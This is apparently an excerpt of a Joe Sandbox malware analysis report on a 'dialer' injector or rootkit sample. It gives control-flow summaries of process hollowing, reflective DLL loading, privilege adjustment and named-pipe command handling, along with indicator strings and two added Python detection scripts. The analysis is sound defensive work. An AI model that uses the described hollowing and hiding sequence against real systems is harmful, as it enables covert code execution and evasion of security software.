                                                           140001994-1400019a4 StrCpyW -> 1400019a7
                                                           1400019a7-1400019aa CloseHandle -> 1400019b0
                                                           1400019b0-1400019b3 -> 1400019b5 | 140001a03
                                                           1400019b5-1400019db -> 1400019df
                                                           1400019df-1400019f1 StrCmpIW -> 1400019f7 | cleanup
                                                           1400019f7-140001a01 -> 1400019df (next name in the list) | 140001a03
                                                           140001a03-140001a22 NtQueryInformationProcess -> 140001a28 | cleanup
                                                           140001a28-140001a2c -> 140001a32 | cleanup
                                                           140001a32-140001a4a OpenProcessToken -> 140001a50 | cleanup
                                                           140001a50-140001a76 GetTokenInformation -> 140001a78 | 140001af3
                                                           140001a78-140001a81 GetLastError -> 140001a83 | 140001af3
                                                           140001a83-140001a97 LocalAlloc -> 140001a99 | 140001af3
                                                           140001a99-140001abf GetTokenInformation -> 140001ac1 | 140001ae1
                                                           140001ac1-140001adf GetSidSubAuthorityCount GetSidSubAuthority -> 140001ae8
                                                           140001ae1 -> 140001ae8
                                                           140001ae8-140001af1 LocalFree -> 140001afa
                                                           140001af3 -> 140001afa
                                                           140001afa-140001b08 CloseHandle -> 140001b0e | cleanup
                                                           140001b0e-140001b15 -> 140001b1b | cleanup
                                                           140001b1b-140001b26 -> 140001b2c | cleanup
                                                           140001b2c-140001b36 -> 140001b38 | 140001b51
                                                           140001b38-140001b42 -> 140001b48 | cleanup
                                                           140001b48-140001b4f and 140001b51 -> 140001b55
                                                           140001b55-140001b8d call 1400029ac (three times) -> 140001b93 | cleanup
                                                           140001b93-140001bb2 call 1400029ac, StrStrA -> 140001bb4 | 140001bcb
                                                           140001bb4-140001bc4 -> 140001b93 (continue the search) | 140001bc6
                                                           140001bc6 -> cleanup
                                                           140001bcb-140001bf1 call 1400029ac (twice) -> 140001bf7 | cleanup
                                                           140001bf7-140001c20 VirtualAllocEx -> 140001c26 | cleanup
                                                           140001c26-140001c3f WriteProcessMemory -> 140001c45 | cleanup
                                                           140001c45-140001c67 call 140002c04 -> 140001c69 | cleanup
                                                           140001c69-140001c71 -> 140001c73 | cleanup
                                                           140001c73-140001c80 WaitForSingleObject -> 140001c82 | 140001cbc
                                                           140001c82-140001c96 GetExitCodeThread -> 140001c98 | 140001ca1
                                                           140001c98-140001c9e -> 140001ca1
                                                           140001ca1-140001cba VirtualFreeEx -> 140001cbc
                                                           140001cbc-140001cc1 CloseHandle -> cleanup
                                                           140001cc7-140001cca CloseHandle -> return
                                                           140001cd0-140001cec return
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$dialer.exe
                                                          • API String ID: 2456419452-213581914
                                                          • Opcode ID: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                          • Instruction ID: c88bb7c69995235f0751d37bc2d3b37891dd0b76cd64fd565fb581fb6c90924f
                                                          • Opcode Fuzzy Hash: 2bee834698dc212ad1e7088f0667ade3b93d0654afe3c54c2a62f3891622f4bd
                                                          • Instruction Fuzzy Hash: 66C14BF170064186EB66DF23B8807EA37A1FB89BC4F444129EB4A47BA4DF38C985C744

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                          • String ID:
                                                          • API String ID: 4084875642-0
                                                          • Opcode ID: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                          • Instruction ID: 28fb11b33fc6f94ec1b72d6715988f9935dfd05350da2d8862b8b96723d9be5a
                                                          • Opcode Fuzzy Hash: ba5697e447d87321b3970d2a80d21a8dae171d7d4a90f8eea2aa6f3ee5ecc7d8
                                                          • Instruction Fuzzy Hash: 145169B27116808AEB66DF63F8587EA26A1F78DBD4F404029EF4947764DF38C586C704

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                          • String ID:
                                                          • API String ID: 3197395349-0
                                                          • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                          • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                          • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                          • String ID: .text$C:\Windows\System32\
                                                          • API String ID: 2721474350-832442975
                                                          • Opcode ID: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                          • Instruction ID: dfe9efa62791befa50248ca661271f48b6fe4723356168206a8c879346357553
                                                          • Opcode Fuzzy Hash: 3c2cac29267c4764876fb0089e5e402af6c2ebc65583537dcb3214cf5c3439df
                                                          • Instruction Fuzzy Hash: 29516AB230468086EB22DF12F8587DAB3A1FB8CBD5F444215AF4A03BA8DF38C549C704

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                          • String ID: M$\\.\pipe\dialerchildproc
                                                          • API String ID: 2203880229-1753684470
                                                          • Opcode ID: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                          • Instruction ID: c448ab6558bdd7463f57c5c12a5a219c56a73407a56f172addbd9e8e0ddff9c1
                                                          • Opcode Fuzzy Hash: 264f81d3a6ac6bca323ce3fa8054da7710f72da389890086086dd295b32d71a1
                                                          • Instruction Fuzzy Hash: 1C1139F121868492E726EB22F8047EA6764B78DBE0F444225FB9A436F6DF7CC548C704

                                                           Control-flow Graph
                                                           • Graph image not reproduced; basic blocks 140002cb8-140002d3d: calls 140002300 (retrying with Sleep until it succeeds), then loops over ConnectNamedPipe, ReadFile and DisconnectNamedPipe, sleeping when ConnectNamedPipe fails before reconnecting.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                          • String ID: \\.\pipe\dialercontrol
                                                          • API String ID: 2071455217-3404160161
                                                          • Opcode ID: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                          • Instruction ID: 4aa5465129413e2f39cc36440aa91cbf4e29d23be742ebc323825d4ea6cf5422
                                                          • Opcode Fuzzy Hash: 3209f241eb13f1ef8ec1a4decc378a022141b60f243280a494fd49a09c45b802
                                                          • Instruction Fuzzy Hash: 080148B120464082FB16EB22F8547EA6360A79DBE1F554225FB66436F5CE7CC948CB00

                                                           Control-flow Graph
                                                           • Graph image not reproduced; basic blocks 14000363c-1400036f8: two GetProcessHeap/HeapAlloc buffers, then an endless loop of K32EnumProcesses, a walk over the returned PIDs calling 140003198 for each, and Sleep before the next enumeration.
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                          • String ID:
                                                          • API String ID: 3676546796-0
                                                          • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                          • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                          • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                          • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                          • String ID:
                                                          • API String ID: 1323846700-0
                                                          • Opcode ID: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                          • Instruction ID: c66517cf2b2c161b5e7adf19ff96308ebd974c614c1f63983815515aa541087b
                                                          • Opcode Fuzzy Hash: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                          • Instruction Fuzzy Hash: DD114CB1B0564086FB16DF27B84439A66A1EB8DBD4F488028FF0903777EE39C486C704

                                                           Control-flow Graph
                                                           • Graph image not reproduced; basic blocks 140002d40-140002d4b: calls 140002d54, then ExitProcess.
                                                          APIs
                                                            • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                            • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                            • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                            • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                            • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                            • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                            • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                            • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                            • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                            • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                            • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                            • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                            • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                            • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                          • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                          • String ID:
                                                          • API String ID: 2472495637-0
                                                          • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                          • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                          • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                          • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                           Control-flow Graph
                                                           • Graph image not reproduced; basic blocks 1400031d8-140003638: a command dispatcher whose branches include ReadFile, RegOpenKeyExW followed by three RegDeleteValueW calls, GetProcessHeap/HeapAlloc with K32EnumProcesses, ShellExecuteW, HeapFree, ExitProcess, and calls into 140002434 (the CreateProcessW/WriteProcessMemory/SetThreadContext routine listed further down), 140001860, 1400020fc, 140001cf0, 140002c64, 140002c90, 140001f7c, 14000217c, 1400017a0, 14000200c and 140001eec.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                          • String ID: SOFTWARE$dialerdll32$dialerdll64$dialerstager$dialersvc32$dialersvc64$open
                                                          • API String ID: 4225498131-1247716241
                                                          • Opcode ID: 6e476a2e5b1b3ef1dbd84d89780c000ad454430e2c58884dce881c51901cee02
                                                          • Instruction ID: e08a93284e424f9f2f03302153dd23542788a9e373c29e46626a4198fc3bbd5f
                                                          • Opcode Fuzzy Hash: 6e476a2e5b1b3ef1dbd84d89780c000ad454430e2c58884dce881c51901cee02
                                                          • Instruction Fuzzy Hash: E0B128F1604A8096EB7BDF27F8543EA22A9F74C7C4F458125BB0A47AB6DE798605C700

                                                           Control-flow Graph
                                                           • Graph image not reproduced; basic blocks 140002434-140002937: CreateProcessW, then one of two parallel paths (native and Wow64) of VirtualAllocEx via 1400020cc, WriteProcessMemory, VirtualProtectEx (per section, via 140002938), VirtualAlloc, GetThreadContext or Wow64GetThreadContext, WriteProcessMemory, SetThreadContext or Wow64SetThreadContext, and ResumeThread; on failure OpenProcess and TerminateProcess on the child.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$CreateOpenResumeTerminate
                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                          • API String ID: 1423830022-1371749706
                                                          • Opcode ID: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                          • Instruction ID: 66eadde3e23c78db0b2c2a162faeb5bceed69f312705dc0718e950d303e6fa69
                                                          • Opcode Fuzzy Hash: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                          • Instruction Fuzzy Hash: 94D17EB670164187EB61CB67F84479AB7A0FB88BD4F004025EF8947BA4DF78D599CB04
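The function above is the sample's process-hollowing routine: it creates a child with CreateProcessW, writes into it with VirtualAllocEx/WriteProcessMemory/VirtualProtectEx, rewrites the entry point through (Wow64)GetThreadContext/(Wow64)SetThreadContext and releases it with ResumeThread. The following detector is an added example, not part of the Joe Sandbox report or the sample; it runs the same ordered API chain over a per-process API trace. The trace line format (caller_pid|api|target_pid) and the trace itself are constructed for illustration.

```python
"""Flag process-hollowing style API chains in a per-process API trace.

Added example; not part of the Joe Sandbox report. The trace format below is
an assumption (caller_pid|api|target_pid), and the sample lines are constructed
to mirror the call pattern of the function at 140002434.
"""
from collections import defaultdict

# Ordered stages of the chain. A stage is satisfied by any API in its set,
# so the native and Wow64 variants are both recognised. The report lists
# the string "NtUnmapViewOfSection" but no resolved call, so unmapping is
# not required here.
STAGES = [
    {"CreateProcessW", "CreateProcessA"},
    {"VirtualAllocEx"},
    {"WriteProcessMemory"},
    {"VirtualProtectEx"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread"},
]

# Constructed sample trace (not taken from the report).
SAMPLE_TRACE = """
# caller_pid|api|target_pid
4512|CreateProcessW|5120
4512|VirtualAllocEx|5120
4512|WriteProcessMemory|5120
4512|VirtualProtectEx|5120
4512|Wow64GetThreadContext|5120
4512|WriteProcessMemory|5120
4512|Wow64SetThreadContext|5120
4512|ResumeThread|5120
# debugger-like activity: touches thread context but never writes code
700|OpenProcess|5120
700|GetThreadContext|5120
700|SetThreadContext|5120
700|ResumeThread|5120
""".strip().splitlines()


def parse_trace(lines):
    """Parse trace lines into (caller_pid, api, target_pid) tuples."""
    calls = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        caller, api, target = line.split("|")
        calls.append((int(caller), api, int(target)))
    return calls


def find_hollowing(calls):
    """Return [(caller, target, matched_apis)] for every (caller, target)
    pair that completed all stages in order.

    Calls that do not match the next expected stage are ignored rather than
    resetting progress, so interleaved unrelated calls cannot hide a chain.
    Progress is tracked per (caller, target) so a second process acting on
    the same child does not inherit the first one's stages.
    """
    progress = defaultdict(list)  # (caller, target) -> APIs matched so far
    hits = []
    for caller, api, target in calls:
        matched = progress[(caller, target)]
        idx = len(matched)
        if idx < len(STAGES) and api in STAGES[idx]:
            matched.append(api)
            if len(matched) == len(STAGES):
                hits.append((caller, target, list(matched)))
    return hits


if __name__ == "__main__":
    for caller, target, apis in find_hollowing(parse_trace(SAMPLE_TRACE)):
        print(f"hollowing chain: pid {caller} -> pid {target}: {' -> '.join(apis)}")
```

A trace that only reads and sets thread context (the second process in the sample) never passes the CreateProcessW or WriteProcessMemory stages, so it is not reported; if the sandbox records the Wow64 variants, they satisfy the same stages as the native calls.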

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                          • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                          • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 3993315683-2879589442
                                                          • Opcode ID: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                          • Instruction ID: 6d7d95916604e4ffecc7df06e5d7207a05ffde36480a44705d0775a9d4fcdff1
                                                          • Opcode Fuzzy Hash: 2b309bef933cfa78f1970bf9c63780987827e412de03e182df68e362c732813e
                                                          • Instruction Fuzzy Hash: 6871D6B6310A5086EB12EF66F8507DD23A4FB88BC8F016115FB4D97A7ADE38C554C744
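The strings in the functions above are the host artefacts a responder would sweep for: the named pipes \\.\pipe\dialercontrol and \\.\pipe\dialerchildproc, the configuration key SOFTWARE\dialerconfig with values paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp, and the values dialerdll32, dialerdll64, dialerstager, dialersvc32 and dialersvc64 under a SOFTWARE key. The triage script below is an added example, not part of the Joe Sandbox report. The report does not show which registry hive the sample opens, so checking both HKLM and HKCU is an assumption; the sample pipe list and registry snapshot are constructed.

```python
"""Sweep a Windows host for the named pipes and registry values listed in the report.

Added example; not part of the Joe Sandbox report. Live collection needs
Windows; the match_* functions also work on exported data from another
tool. The choice of hives (HKLM and HKCU) is an assumption.
"""
import os
import sys

PIPE_IOCS = {"dialercontrol", "dialerchildproc"}
CONFIG_KEY = r"SOFTWARE\dialerconfig"
CONFIG_VALUES = {"paths", "pid", "process_names", "service_names",
                 "startup", "tcp_local", "tcp_remote", "udp"}
STAGER_VALUES = {"dialerdll32", "dialerdll64", "dialerstager",
                 "dialersvc32", "dialersvc64"}

# Constructed sample data (not from the report) for offline use.
SAMPLE_PIPES = ["lsass", "DialerControl", "srvsvc", "dialerchildproc"]
SAMPLE_REG = {
    r"HKLM\SOFTWARE": {"dialersvc64": "constructed-data", "VendorValue": "x"},
    r"HKLM\SOFTWARE\dialerconfig": {"process_names": "constructed", "udp": "1"},
    r"HKCU\SOFTWARE": {"VendorValue": "y"},
}


def match_pipes(pipe_names):
    """Return pipe names whose lower-cased form is one of the IOC pipes."""
    return sorted(n for n in pipe_names if n.lower() in PIPE_IOCS)


def match_registry(values_by_key):
    """values_by_key: {'HIVE\\path': {value_name: data}}.

    Returns sorted (key_path, value_name) findings: any known value under
    SOFTWARE\\dialerconfig, and any of the dialer* stager values directly
    under a SOFTWARE key. Matching is case-insensitive, as the registry is.
    """
    findings = []
    for key, values in values_by_key.items():
        tail = key.split("\\", 1)[-1].lower()  # drop the hive prefix
        for name in values:
            lname = name.lower()
            if tail == CONFIG_KEY.lower() and lname in CONFIG_VALUES:
                findings.append((key, name))
            elif tail == "software" and lname in STAGER_VALUES:
                findings.append((key, name))
    return sorted(findings)


def collect_windows():
    """Live collection (Windows only): (pipe_names, values_by_key)."""
    import winreg
    pipes = os.listdir(r"\\.\pipe\\")
    out = {}
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE),
                            ("HKCU", winreg.HKEY_CURRENT_USER)):
        for sub in ("SOFTWARE", CONFIG_KEY):
            try:
                key = winreg.OpenKey(hive, sub)
            except OSError:
                continue  # key absent: nothing to report for this hive
            vals, i = {}, 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                vals[name] = data
                i += 1
            out[f"{hive_name}\\{sub}"] = vals
    return pipes, out


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("live collection needs Windows; feed exported data to match_*")
    pipes, reg = collect_windows()
    for p in match_pipes(pipes):
        print("pipe:", p)
    for k, v in match_registry(reg):
        print("registry:", k, v)
```

Presence of the SOFTWARE\dialerconfig key alone is already worth escalating; the value names (process_names, service_names, tcp_local, tcp_remote, udp) match the hooks the report flags for hiding processes and network artefacts, so their data is the first thing to pull for scoping.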
                                                          APIs
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Delete$CloseEnumOpen
                                                          • String ID: SOFTWARE\dialerconfig
